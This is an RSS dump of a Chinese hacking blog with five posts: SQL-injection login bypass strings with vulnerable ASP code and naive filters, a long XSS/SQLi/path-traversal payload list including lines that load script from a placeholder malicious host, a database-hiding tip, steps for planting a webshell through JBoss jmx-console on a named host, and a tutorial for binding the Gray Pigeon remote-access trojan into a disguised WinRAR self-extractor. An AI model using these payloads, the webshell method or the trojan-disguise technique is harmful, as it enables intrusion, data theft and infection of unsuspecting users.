https://www.heckjj.com/index.php zh-cn https://www.heckjj.com/resolve-the-or-equals-or-sqlinject-html/ Heck <@hecks.tk> Tue, 18 Jan 2011 07:20:35 +0000 https://www.heckjj.com/resolve-the-or-equals-or-sqlinject-html/ 咱们提起这个万能密码，我相信玩过黑的都非常熟悉吧，也就是'or' = 'or'属于很老的漏洞，这只最基础的一种，最近我看见很多网站有这种bug，最近有个辽宁沈阳的小伙在google搜索关键词“332003231 后台”貌似想黑哥我一把。下面我来总结一下吧:

1：语句:''or'='or' a'or'1=1-- 'or1=1-- "or1=1-- or1=1-- 'or"="a'='a ') or ('a'='a等等。。。
<%
(1)pwd = request.form("pwd") "获取客户端输入的密码,再把值赋给pwd"
(2)name = request.form("name") "获取客户端输入的用户名再把值赋给name"
都没有进行任何过滤
(3)Set rs = Server.CreateObject("ADODB.Connection") "利用Server对象的CreateObject方法创建ADO组件的Connection对象"
(4)sql = "select * from Manage_User where UserName='" & name & "' And PassWord='"&encrypt(pwd)&"'" "将用户名和密码放入查询语句中查询数据库"
(5)Set rs = conn.Execute(sql) "执行SQL语句"

(6)If Not rs.EOF = True Then "当前的记录位于Connection对象的最记录之后一个前"
(7)Session("Name") = rs("UserName") "将UserName的属性赋给Name的Session自定义变量"
(8)Session("pwd") = rs("PassWord") "将PassWord的属性赋给pwd的Session自定义变量"
(9)Response.Redirect("Manage.asp")了 "利用Response对象的Redirect方法重定向"Manage.asp"
(10)Else
(11)Response.Redirect "chklogin.asp?msg=您输入了错误的帐号或口令，请再次输入！"
(12)End If
(13)end if
%>
这是很明显有漏洞的login.asp的代码.
直接从这两句就可以看出来..
(1)pwd = request.form("pwd") "获取客户端输入的密码,再把值赋给pwd"
(2)name = request.form("name") "获取客户端输入的用户名再把值赋给name"
没有进行任何的过滤..
网上流传着这么一个代码说是很好的防范的..
name=replace(request.form("name") ,"'","")
pass=replace(request.form("pass") ,"'","")
可是一旦用上了此代码 就发现了问题了.
过滤掉了'号之后管理员的密码和名称就不能用这样的符号了，那怎么办呢？看我这个方法..
嘿嘿。
pwd = request.form("pwd")
name = request.form("name")
if (name<>"") and (Pwd<>"") then '判断数据为非空
name=Replace(Replace(name,"'",""),"or","") '嵌套了两个replace函数，过滤特殊字符
Pwd=Replace(Replace(Pwd,"'",""),"or","")

当然还有一种办法是定义一个检查输入的方法，然后登陆时调用这个方法：
<%
Function ChkStr(istr)
dim Sql_Kill,Sql_Kill_2,Sql_Kill_3
Sql_Kill = "\'|and|or|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|set|;|from|="
Sql_Kill_2 = split(Sql_Kill,"|")
for Each Sql_Kill_3 In Sql_Kill_2
istr=Replace(istr,Sql_Kill_3,"")
Next
ChkStr=istr
End Function
%>
上面的方法也是就是将比如"or"这些关键词给替换成空格。
Tags - sql注入 ]]> https://www.heckjj.com/cross-site-script-bug-safe-test-html/ Heck <@hecks.tk> Mon, 25 Oct 2010 11:53:25 +0000 https://www.heckjj.com/cross-site-script-bug-safe-test-html/ 很多网站存在xss 跨站脚本漏洞，下面的安全测试测用例还是挺管用的，能够查找和发现潜在的bug，大家可以试试看吧。  
　<script>alert(document.cookie)</script>
　　='><script>alert(document.cookie)</script>
　　<script>alert(document.cookie)</script>
　　<script>alert(vulnerable)</script>
　　%3Cscript%3Ealert('XSS')%3C/script%3E
　　<script>alert('XSS')</script>
　　<img src="javascript:alert('XSS')">
　　%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
　　%22%3cscript%3ealert(%22x ss%22)%3c/script%3e
　　%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
　　%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
　　%3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
　　%3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
　　%3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html
　　<script>alert('Vulnerable');</script>
　　<script>alert('Vulnerable')</script>
　　?sql_debug=1
　　a%5c.aspx
　　a.jsp/<script>alert('Vulnerable')</script>
　　a?<script>alert('Vulnerable')</script>
　　"><script>alert('Vulnerable')</script>
　　';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&
　　%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
　　%3Cscript%3Ealert(document. domain);%3C/script%3E&
　　 %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID= 1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
　　../../../../../../../../etc/passwd
　　..\..\..\..\..\..\..\..\windows\system.ini
　　\..\..\..\..\..\..\..\..\windows\system.ini
　　'';!--"<XSS>=&{()}
　　<IMG SRC="javascript:alert('XSS');">
　　<IMG SRC=javascript:alert('XSS')>
　　<IMG SRC=JaVaScRiPt:alert('XSS')>
　　<IMG SRC=JaVaScRiPt:alert("XSS")>
　　<IMG SRC=javascript:alert('XSS')>
　　<IMG SRC=javascript:alert('XSS')>
　　<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
　　<IMG SRC="javascript:alert('XSS');">
　　"<IMG SRC=java\0script:alert(\"XSS\")>";' > out
　　<IMG SRC=" javascript:alert('XSS');">
　　<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
　　<BODY BACKGROUND="javascript:alert('XSS')">
　　<BODY ONLOAD=alert('XSS')>
　　<IMG DYNSRC="javascript:alert('XSS')">
　　<IMG LOWSRC="javascript:alert('XSS')">
　　<BGSOUND SRC="javascript:alert('XSS');">
　　<br size="&{alert('XSS')}">
　　<LAYER SRC="http://恶意网址/a.js"></layer>
　　<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
　　<IMG SRC='vbscript:msgbox("XSS")'>
　　<IMG SRC="mocha:[code]">
　　<IMG SRC="livescript:[code]">
　　<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
　　<IFRAME SRC=javascript:alert('XSS')></IFRAME>
　　<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>
　　<TABLE BACKGROUND="javascript:alert('XSS')">
　　<DIV STYLE="background-image: url(javascript:alert('XSS'))">
　　<DIV STYLE="behaviour: url('http://恶意网址/exploit.html');">
　　<DIV STYLE="width: expression(alert('XSS'));">
　　<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
　　<IMG STYLE='x ss:expre\ssion(alert("XSS"))'>
　　<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
　　<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
　　<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
　　<BASE HREF="javascript:alert('XSS');//">
　　getURL("javascript:alert('XSS')")
　　a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);
　　<XML SRC="javascript:alert('XSS');">
　　"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"
　　<SCRIPT SRC="http://恶意网址/x ss.jpg"></SCRIPT>
　　<IMG SRC="javascript:alert('XSS')"
　　<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://恶意网址/a.js></SCRIPT>'"-->
　　<IMG SRC="http://恶意网址/somecommand.php?somevariables=maliciouscode">
　　<SCRIPT a=">" SRC="http://恶意网址/a.js"></SCRIPT>
　　<SCRIPT =">" SRC="http://恶意网址/a.js"></SCRIPT>
　　<SCRIPT a=">" '' SRC="http://恶意网址/a.js"></SCRIPT>
　　<SCRIPT "a='>'" SRC="http://恶意网址/a.js"></SCRIPT>
　　<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://恶意网址/a.js"></SCRIPT>
　　<A HREF=http://恶意网址/>link</A>
　　admin'--
　　' or 0=0 --
　　" or 0=0 --
　　or 0=0 --
　　' or 0=0 #
　　" or 0=0 #
　　or 0=0 #
　　' or 'x'='x
　　" or "x"="x
　　') or ('x'='x
　　' or 1=1--
　　" or 1=1--
　　or 1=1--
　　' or a=a--
　　" or "a"="a
　　') or ('a'='a
　　") or ("a"="a
　　hi" or "a"="a
　　hi" or 1=1 --
　　hi' or 1=1 --
　　hi' or 'a'='a
　　hi') or ('a'='a
　　hi") or ("a"="aXSS测试语法><script>alert(document.cookie)</script>
Tags - xss , css , 跨站脚本漏洞 , 安全测试 ]]> https://www.heckjj.com/access-db-to-avoid-download/ Heck <@hecks.tk> Sun, 26 Sep 2010 00:37:54 +0000 https://www.heckjj.com/access-db-to-avoid-download/ 以前有写过一篇关于access安全的文章，但总觉得有不足，经过测试研究后，重新写出来，欢迎大家进行讨论。
首先我们知道常见的傻瓜式入侵ASP网站下载默认数据库是其中一个方法，挖掘机挖掘大量的网站，寻找网站中存在的默认数据库。数据库作为一个动态网站最重要的核心，里面记录了大量信息。作为一名入侵者，拿到数据库就等于拿到网站的权限了，轻则泄露数据，重则影响网站乃至整个服务器的安全。

ASP ACCESS的网站结构是网上最流行的架构方式之一，几乎的站长使用的都是别人的网站系统，很多人都忽略了修改默认数据库，从而导致入侵者有入侵的机会。

在入侵ASP ACCESS网站系统中，直接下载数据库、使用一句话木马是最常见的方法，其中直接下载数据库包括了通过暴库和直接下载默认数据库来得到数据库路径，插入一句话木马是针对得到数据库地址，并且是ASP或者ASA为扩展名的数据库。

所以网上流传的修改数据库扩展名为ASP和ASA不是一个最安全的方法，反而被入侵者知道路径后，是一个致命的错。而将数据库名加上#也并非安全的做法。

通过上面总结后我们知道，只要让入侵者无法下载数据库，无法插入一句话木马，即使他们知道路径也无妨。

经过测试，我发现，只要将数据库的扩展名删除，就可以做到了。大家都知道IIS里有个默认文档，当用户浏览网站主页或者网站目录时，首先浏览的就是这默认文档，一般为index.htm、index.asp等等。如果删除了扩展名，那么直接提交数据库地址时，就会被误认为浏览目录，但这个目录并非存在，所以404错误，返回找不到该页。举例：假设我们取数据库名为"hoversnow"（没有扩展名），然后通过访问地址http://**/hoversnow，假设默认文档最前面的一个是index.htm，在访问时会被解析为http://**/hoversnow/index.htm，因为此目录不存在而找不到（测试环境是Windows XP/2003，IIS 5.0/6.0，FAT32/NTFS的硬盘）。但是我在本地测试时，一样可以下载（本地环境是XP和IIS5.0），而上传到空间里测试，却无法下载（空间环境是2003和IIS6.0），于是我想，把文件名里加一个“/”，让他解析成目录，但是文件名中不能含有“/”，所以我把“/”转成了ASCII编码&#47;，经过测试，返回404错误且网站能正常访问（数据库没有连接错误）。

本文有不足之处欢迎讨论。
Tags - access , 数据库 , 防下载 ]]> https://www.heckjj.com/jboss-server-bug-html/ Heck <@hecks.tk> Wed, 01 Sep 2010 15:06:19 +0000 https://www.heckjj.com/jboss-server-bug-html/ 在JBOSS默认配置下会有一个后台漏洞，漏洞发生在jboss.deployment命名空间中的addURL()函数,该函数可以远程下载一个war压缩包并解压访问http://www.safe3.com.cn:8080/jmx-console/ 后台，如下图

下拉找到如下图所示

点击flavor=URL,type=DeploymentScanner进入

在输入框中写入war压缩文件webshell的url地址，如上图
点击invoke执行界面获得一个jsp的webshell，如下图

Tags - jboss , 漏洞 , bug ]]> https://www.heckjj.com/post/46/ Heck <@hecks.tk> Sat, 16 May 2009 07:33:01 +0000 https://www.heckjj.com/post/46/ 大家好，我叫汏，壊豬~，也叫汏，壊蛋~.当然啦有很多朋友也叫我猪头。嘿嘿
可能是太猪了吧。呵呵，谁叫俺是猪头呢。
今天我来给大家讲下rar压缩文件的高级捆绑技术也就是说
我们要利用winrar创建自解压文件然后在里面捆绑我们的木马。

这个鸽子配制就不用我再说了吧。还不会鸽子配制的朋友请去看下相关的教程，本教程只说rar高级捆绑技术

好了，木马生好了。开始捆绑，我要捆绑这个流量精灵。

首先第一种方法是用VBS脚本来弄，看我演示

这个VBS文件里写的就是执行这木马文件和流量精灵这个工具。我们不能直接把木马发给人家是吧。要么人家双击没反应以为是干嘛呢。
所以这里就捆个。

这里就用第一种方法捆好。看啊。鸽子上线么。=下啊。
嘿嘿上了吧。这是我的机子上了。呵呵。好开始第二种方法
直接执行捆绑文件和木马看好了啊。

第二种也捆好了。来我们看上线么。呵呵，上了吧。
其实很简单的。

首先我们要准备好以下几个东西


1、c32asm

2、远程控制软件，这里我用的是灰鸽子

3、被捆绑的软件(这里我用的是灰鸽子生成的服务端木马)

你看这样子用winrar能打开看得到。所以我们要想办法把这个右键菜单中的用winrar打开去掉。来，看我弄。

用c32asm打开自解压以十六进制的形式打开然后
搜索十六进制807A0161，把61改成其它数值,这里我改了22

再搜索十六进制526172211A07，把61改成之前改的值,改成上面的22

好了看下可以么.嘿嘿。右键中的那个用winrar项没有了吧。好教程到这。
谢谢大家。有问题加我QQ：332003231，大家有兴趣的话可以关注我的blog，另本人不收徒。
教程下载地址：
点击这里下载文件
Tags - rar高级木马捆绑 ]]>